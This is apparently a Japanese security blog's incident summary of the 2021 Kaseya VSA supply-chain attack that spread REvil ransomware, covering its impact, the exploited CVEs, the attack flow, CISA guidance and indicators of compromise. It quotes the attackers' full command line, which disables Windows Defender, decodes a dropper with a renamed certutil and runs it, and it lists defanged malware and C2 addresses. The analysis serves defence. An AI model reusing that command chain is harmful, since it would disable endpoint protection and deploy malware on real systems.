piyolog

piyokangoの備忘録です。セキュリティの出来事を中心にまとめています。このサイトはGoogle Analyticsを利用しています。

多数の組織がランサムウエアに感染したサプライチェーン攻撃についてまとめてみた

2021年7月2日、米フロリダ州のIT企業のKaseyaは同社のRMM(リモート監視・管理)製品である「Kaseya VSA」をオンプレミスで利用している顧客に対してサイバー攻撃が発生していると公表しました。同製品を運用する顧客の多くはMSP事業者で、MSPサービスを利用する多数の中小企業などに影響が及びました。ここでは関連する情報をまとめます。

1.最大1500組織にランサムウエアの影響か

  • Kaseya VSAの未修正の脆弱性が悪用され、VSAのシステム管理対象の端末に対してランサムウエアに感染するPowerShellスクリプトが配られ実行された。
  • Kaseya VSAはマネージドサービスプロバイダーに導入されるケースが多く、MSP事業者が攻撃を受けたことによりサービスを利用する多数の組織に被害が及んだ。一方で、Kaseyaが把握している当該事案のターゲットとなったMSP事業者数は50~60程度とされ、ランサムウエアによる影響を受けた組織も800~1500と推計されている。Kaseyaの顧客数は3万5000件超(大半はMSP事業者とされ、その管理対象の組織総計は約80万~100万)とされ、同社は被害に遭った実数から今回の攻撃による影響は限定的との見解を示している。また被害に遭った端末は最大で4万台程度とする報道も行われている。 *1
  • 事案発生を受け、Kaseya VSAをオンプレミスで運用しているユーザー(主にMSP事業者)に対して即時にオフラインとすること、さらにSaaSとして提供されるサービスをシャットダウンを行っている。(Kaseya自社や同社が提供するSaaSへの影響は確認されていない。)またランサムウエアを通じた攻撃者からのメッセージを受け取った場合はリンクのクリックを行わないよう呼びかけを行った。
  • Kaseyaは今回の事案を受け、FBI、CISA、ホワイトハウス、国土安全保障省などの政府組織との連携を行っている他、FireEye Mandiant IRチームに対して今回のインシデントを受け調査依頼を行っていると説明。また侵害検出用のツールを提供している。
f:id:piyokango:20210711110920p:plain
Kaseya VSAを狙ったランサムウエア事案の概要図
100万台攻撃を主張する声明
  • 使用されたランサムウエアやリークサイトへの投稿など、今回の事案はREvil (Sodinokibi)に帰属するランサムウエア事案とセキュリティベンダ*2などからみられている。
  • REvilはKaseya VSAへの侵害を通じて100万台への影響を及ぼしたと主張し、被害に遭った全ての組織に対する復号ツールと引き換えにKaseyaに対して7000万ドル(約77億円)相当のBTCを要求したとリークサイト上に掲載。(SNS上では要求金額が5000万ドルに引き下げられたと報告するツイートもある。またMSP事業者向けには500万ドル、被害組織には44,999ドルの要求で対応するとした。)
  • REvilは暗号化と窃取情報の暴露の二重脅迫の手口を行うことが知られるが、今回のKaseya VSAを標的にした一連の攻撃で情報窃取が発生したかについては明らかになっていない。またBleeping Computerはデータの窃取が発生していないことを示すチャットを公開している。*3
  • Kaseyaは身代金要求に応じる用意があるかどうか取材を受けているが言及を避けている。*4 被害に遭った企業の内2社で身代金の支払いが行われたとBleeping Computerは取り上げている。*5
f:id:piyokango:20210709213549p:plain
REvil のリークサイトに掲載された声明
複数国で被害発生

  • スウェーデンのスーパーマーケット CoOpが約800に及ぶ全国の店舗を土曜日に一時閉鎖したことが報じられている。同社は同じくスウェーデンのMSP Visma EssCom社が支払システムの管理を行っている。Visma社はKaseyaのユーザー。*6 *7
  • ニュージーランドでは11の学校、複数の幼稚園が影響を受けたと報じられている。
  • ESETはテレメトリより17か国に影響が及んだとし、とりわけ米国、英国、南アフリカ、カナダ、ドイツ、コロンビアからのレポートが多くを占めるとブログで明らかにしている。また、ESETのツイートには日本も含まれているが、7月10日時点で今回の事案に関連するとみられる被害公表はpiyokangoは確認していない。*8
  • 7月4日にDIVDがスキャンを行ったところ、過去に2200件確認されたホストが140未満に減少。*9 DVIDは公開されたVSAのIPアドレスリスト、顧客IDのリストをKaseyaに提供している。

被害公表しているMSP事業者

2.RMMの0day脆弱性を悪用

  • Kaseya VSAへの攻撃には脆弱性 CVE-2021-30116 が悪用されたとみられている。悪用された7月2日時点では未修整で7月11日に修正パッチのリリースが公開された。認証バイパスの脆弱性とされるが悪用された脆弱性が他にないのかを含め、脆弱性関連の情報はKaseyaから直接の言及が7月10日時点で行われていないため不明である。(MSP事業者のIR対応を行っているセキュリティ企業より関連する情報が公開されている。)
  • 今回の事案以前にオランダのDIVD(Dutch Institute for Vulnerability Disclosure) CSIRTがKaseyaVSAの脆弱性を7件確認しており、Kaseyaへは4月に報告が行われていた。今回悪用された脆弱性がその中で報告済みのCVE-2021-30116であると言及している。
  • DIVDが報告した脆弱性は4月10日、5月8日に一部が修正されている。CVE-2021-30116は6月26日にSaaSに対してアップデートが行われている。DIVDが今回の事案を受けて脆弱性に関連する限定開示を行っており、7月7日時点で解決中とした脆弱性は3件となっている。

DIVDが報告した脆弱性

CVE 概要 対応状況(7月10日時点)
CVE-2021-30116 認証情報リークとビジネスロジックの欠陥 9.5.7a(7月11日パッチ)で修正済
CVE-2021-30119 クロスサイトスクリプティングの脆弱性 9.5.7a(7月11日パッチ)で修正済
CVE-2021-30120 2要素認証のバイパス 9.5.7a(7月11日パッチ)で修正済
CVE-2021-30118 リモートコード実行の脆弱性 9.5.5(4月10日パッチ)で修正済
CVE-2021-30117 SQLインジェクションの脆弱性 9.5.6(5月8日パッチ)で修正済
CVE-2021-30121 ローカルファイルインクルージョンの脆弱性 9.5.6(5月8日パッチ)で修正済
CVE-2021-30201 XML外部エンティティの脆弱性 9.5.6(5月8日パッチ)で修正済

3.侵害したVSAを通じ不正スクリプト拡散

攻撃者によって侵害されたKaseya VSAを通じて、次の流れで管理対象となる端末に対し攻撃が行われた。

  1. VSAからスクリプトが配信され実行
  2. PowerShellを通じてWindows Defenderを無効化
  3. CertUtilを使いドロッパーをデコードし生成
  4. ドロッパーから2つのファイルを生成
  5. 生成された正規のWindows Defenderを使ってランサムのDLLをサイドローディング
  6. ファイルを暗号化し脅迫文を作成
  7. Netshでファイアウォール設定を変更
f:id:piyokango:20210712053534p:plain
攻撃手口の概要図
(1) VSAからスクリプトを配信し実行
  • 2021年7月2日11時頃 Kaseya VSAを通じてKaseya VSA Agent HotFixという名前のスクリプトが配信・実行された。また追加のプロシージャとしてArchiveand Purge Logsという名前のスクリプトも実行されるケースが確認されている

スクリプトでは次の処理が実行される。

"C:\WINDOWS\system32\cmd.exe" /c ping 127.0.0.1 -n (ランダムな数字) > nul & C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe & echo %RANDOM% >> C:\Windows\cert.exe & C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe & del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe

スクリプトではまずPINGを使ってタイマー的な動き(スリープ機能)を行っている。

  • ローカルホストに対して指定された数字の回数だけ送信する。
  • 1回あたり1秒となることから4桁の数字を指定することで数十分間、スクリプト実行後に実処理開始を遅らせることが出来る。
  • VSA側で配信する際にランダムに数字を生成し、端末ごとに実行開始時間を変更している。

ここで行われている内容として、マルウエアが作成されるだけでなく、Windows Defenderの様々な機能の無効化が行われている。具体的には次のもの。

  • リアルタイム保護の無効化
  • 既知の脆弱性悪用に対する保護の無効化
  • ダウンロードや添付されたファイルのスキャン無効化
  • スクリプトスキャンの無効化
  • 制御されたフォルダーアクセスの無効化
  • ネットワーク保護を監査モード(悪性のIPアドレス、ドメインの非遮断)で動作
  • クラウドによる保護の無効化
  • 詳細分析必要時のファイルサンプル送信無効化

スクリプトは正規のcertutil.exe(cert.exeにランダムな文字列を追加したファイル名に変更)を使ってagent.crtをデコードし、Cドライブ直下にあるkworkingフォルダにagent.exeのファイル名で出力される。agent.exeは次の有効な証明書によるデジタル署名が行われている。コンパイル時間は実行直前日の2021年7月1日14時40分29秒。

Name: PB03 TRANSPORT LTD.
Email: Brouillettebusiness@outlook.com
CN = Sectigo RSA Code Signing, CAO = Sectigo Limited, L = Salford, S = Greater Manchester, C = GB
Serial #: 119acead668bad57a48b4f42f294f8f0
Issuer: https://sectigo.com/

kworkingはKaseya VSAの端末に既定でagent working directoryとして指定されているフォルダで、Kaseya Agentが適切に動作するためにウイルス対策ソフトの除外対象とすることが推奨されている。

(2) ドロッパーで2つのファイルを作成

agent.exeを実行すると2つのファイルを出力し、DLL Side loadingという手法を用いてWindows Defenderの実行ファイル(古いバージョン)をLOLBinとして使用し、ランサムウエア(mpsvc.dll)を起動する。
agent.exeから生成される2つのファイル

MsMpEng.exe Windows Defenderの正規の実行ファイル LOLBinとして使用
mpsvc.dll REvilの暗号化ソフトウェア (ランサムウエア)
(3) 端末内を暗号化

確認されたランサムウエアについて、次の機能が確認されている。

  • 特定の8のサービスの無効化と削除、29のプロセスの停止。*10
  • 暗号化処理が実行される際、レジストリBlackLivesMatterが追加される。ここには攻撃の構成情報とみられるキーが格納される。
  • netshコマンドを使ってローカルネットワーク上で接続できるようにファイアウォールの設定を変更する。
  • 実行端末のOSに設定された言語を検出し、特定言語に該当する場合は実行プロセスを停止。
  • 実行端末の壁紙の変更、および脅迫メッセージファイルの生成。(表示されるメッセージ

停止対象のプロセスやサービス

停止対象サービス veeam, memtas, sql, backup, vss, sophos, svc$, mepocs
停止対象プロセス encsvc, powerpnt, ocssd, steam, isqlplussvc, outlook, sql, ocomm, agntsvc, mspub, onenote, winword, thebat, excel, mydesktopqos, ocautoupds, thunderbird, synctime, infopath, mydesktopservice, firefox, oracle, sqbcoreservice, dbeng50, tbirdconfig, msaccess, visio, dbsnmp, wordpad, xfssvccon

4.関連事象

(1) CISAのガイダンス
  • 事案発生を受け、2021年7月4日に米CISA、FBIはMSPとその顧客向けに攻撃影響を緩和するためのガイダンスを公開し、これに従うよう強く要請した。
  • ガイダンスではMSP事業者に対して4つ、その顧客に対して3つのアクションを推奨している。
MSP事業者向け ①KaseyaVSA検出ツールをダウンロードし、IOCがシステム上に存在するかを確認する。
②単一アカウントに対して多要素認証を有効し、また顧客向けサービスに対しても多要素認証を有効にする。
③通信許可リストを作成し、リモート監視・管理機能に対して既知のIPアドレスに制限する。
④RMMの管理インターフェースをVPNまたは専用の管理ネットワーク上でFWよりも後ろに配置する。
MSP利用顧客向け ①バックアップを最新であることを確認し、エアギャップされ容易に取得可能な場所に保管されていることを確認する。
②ベンダーの修正ガイダンスに従い、手動でのパッチ管理プロセスに戻し、修正パッチが利用可能になり次第インストールを行う。
③多要素認証、主要なネットワーク管理アカウントに対する最小特権の原則に基づいた実装を行う。
(2) Kaseya VSAの修正通知を騙るメール

Kaseya VSAの脆弱性修正を行うとしてMicrosoftアップデートプログラムが公開したと騙り添付ファイルを実行させようとするメールが確認された。

  • 添付されているのは実行ファイル(SecurituUpdates.exe)で、誤って実行するとCobaltStrikeに感染する。
  • ESETによれば、特にバラマキの対象となっているのはスペイン、米国、カナダ、トルコ、英国
Payload 32fc03caa22bc3bbf778b04da675e528dd7125a61da6f9fc5e532230745bcd8c
ダウンロードURL hxxp://45.153.241[.]113/download/pload.exe
C2 Server 31.42.177[.]52

(3) Kaseyaのカスタマーサポートサイトに5年前の脆弱性

KrebsOnSecurityが7月3日にKaseyaに対してMandiantからカスタマーサポートサイトにCVE-2015-2862の脆弱性が存在していると指摘を受けていたと記事に取り上げた。

  • カスタマーサポートサイトはportal.kaseya.netで稼働していたもの。実は指摘を受けたポータルは2018年時点で廃止され、新しい基盤へ移行済みであった。何故古いサイトがオンライン状態となっていたかは不明。
  • CVE-2015-2862はディレクトリトラバーサルの脆弱性で外部のユーザーがサーバー上のファイルを読み取りできるもの。
  • 実際に7月3日午後までにサイト上のweb.configファイルを取得できる状態にあった。
  • 今回のランサムウエア事案に対してこの脆弱性の問題が関係があるとする証拠は確認されていないとKaseyaは説明。

5.関連情報

インディケーター情報
  • 今回の事案に関連するインディケーター情報はPeterLowe氏がGithub上に保管しているリストがCISAのガイダンスより参照されている。但し、緊急性を要する事案であることから共有されたもので内容保障は行っていないとも記載されている。
  • Kaseya が特定したとして、次のインディケーター情報を掲載している。
VSAへの攻撃に用いられた接続元のIPアドレス 35.226.94[.]113
161.35.239[.]148
162.253.124[.]162
ランサムウエア展開に使用されたファイル 正規ファイル (cert.exe)
939aae3cc456de8964cb182c75a5f8cc (agent.crt)
561cffbaba71a6e8cc1cdceda990ead4 (agent.exe)
a47cf00aedf769d60d58bfe00c0b5421 (mpsvc.dll)
攻撃者のHTTPリクエスト POST /dl.asp curl/7.69.1
GET /done.asp curl/7.69.1
POST /cgi-bin/KUpload.dll curl/7.69.1
GET /done.asp curl/7.69.1
POST /cgi-bin/KUpload.dll curl/7.69.1
POST /userFilterTableRpt.asp curl/7.69.1
  • セキュリティベンダなどが公開しているインディケーター情報は以下の通り。
ファイル名 ハッシュ値
agent.crt 2093c195b6c1fd6ab9e1110c13096c5fe130b75a84a27748007ae52d9e951643
agent.exe d55f983c994caa160ec63a59f6b4250fe67fb3e8c43a388aec60a4a6978e9f1e
df2d6ef0450660aaae62c429610b964949812df2da1c57646fc29aa51c3f031e
dc6b0e8c1e9c113f0364e1c8370060dee3fcbe25b667ddeca7623a95cd21411f
aae6e388e774180bc3eb96dad5d5bfefd63d0eb7124d68b6991701936801f1c7
66490c59cb9630b53fa3fa7125b5c9511afde38edab4459065938c1974229ca8
81d0c71f8b282076cd93fb6bb5bfd3932422d033109e2c92572fc49e4abc2471
1fe9b489c25bb23b04d9996e8107671edee69bd6f6def2fe7ece38a0fb35f98e
mpsvc.dll 8dd620d9aeb35960bb766458c8890ede987c33d239cf730f93fe49d90ae759dd
e2a24ab94f865caeacdf2c3ad015f31f23008ac6db8312c2cbfb32e4a5466ea2
d8353cfc5e696d3ae402c7c70565c1e7f31e49bcf74a6e12e5ab044f306b4b20
d5ce6f36a06b0dc8ce8e7e2c9a53e66094c2adfc93cfac61dd09efe9ac45a75f
cc0cdc6a3d843e22c98170713abf1d6ae06e8b5e34ed06ac3159adafe85e3bd6
0496ca57e387b10dfdac809de8a4e039f68e8d66535d5d19ec76d39f7d0a4402
8e846ed965bbc0270a6f58c5818e039ef2fb78def4d2bf82348ca786ea0cea4f
レジストリ HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\BlackLivesMatter
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon -> DefaultPassword=DTrump4ever

他インディケーターに関連する情報

関連タイムライン
日時 出来事
2021年4月上旬 DIVD CSIRTが今回悪用された脆弱性を含む7件の情報をKaseyaへ報告。
2021年4月10日 Kaseyaが報告を受けた脆弱性の内、1件を修正する修正パッチ(9.5.5)を公開。
2021年5月8日 Kaseyaが報告を受けた脆弱性の内、2件を修正する修正パッチ(9.5.6)を公開。
2021年7月2日 Kaseya が同社製品を通じたランサムウエア感染事案が発生していると公表。
同日 CISAがKaseya VSAによるMSP事業者に対するサプライチェーン攻撃が発生しており、Kaseyaのアドバイザリに従うよう推奨
2021年7月3日 Kaseyaが侵害検出を可能とするツールを公開。
2021年7月4日 CISA,FBIがKaseyaVSAによるサプライチェーン攻撃に対する攻撃緩和のためのガイダンスを公開。
2021年7月6日 Kaseyaが攻撃の対処状況を報告。被害は限定的の見解を示す。
2021年7月9日 Kaseyaを騙るスパムメールが発生しているとして注意を呼びかけ。
2021年7月11日 悪用された脆弱性の修正を含むKaseya VSAへの修正パッチ(9.5.7a)が公開。
関連リンク

Kaseyaの公式発表

セキュリティ組織等の分析記事

更新履歴

  • 2021年7月11日 PM 新規作成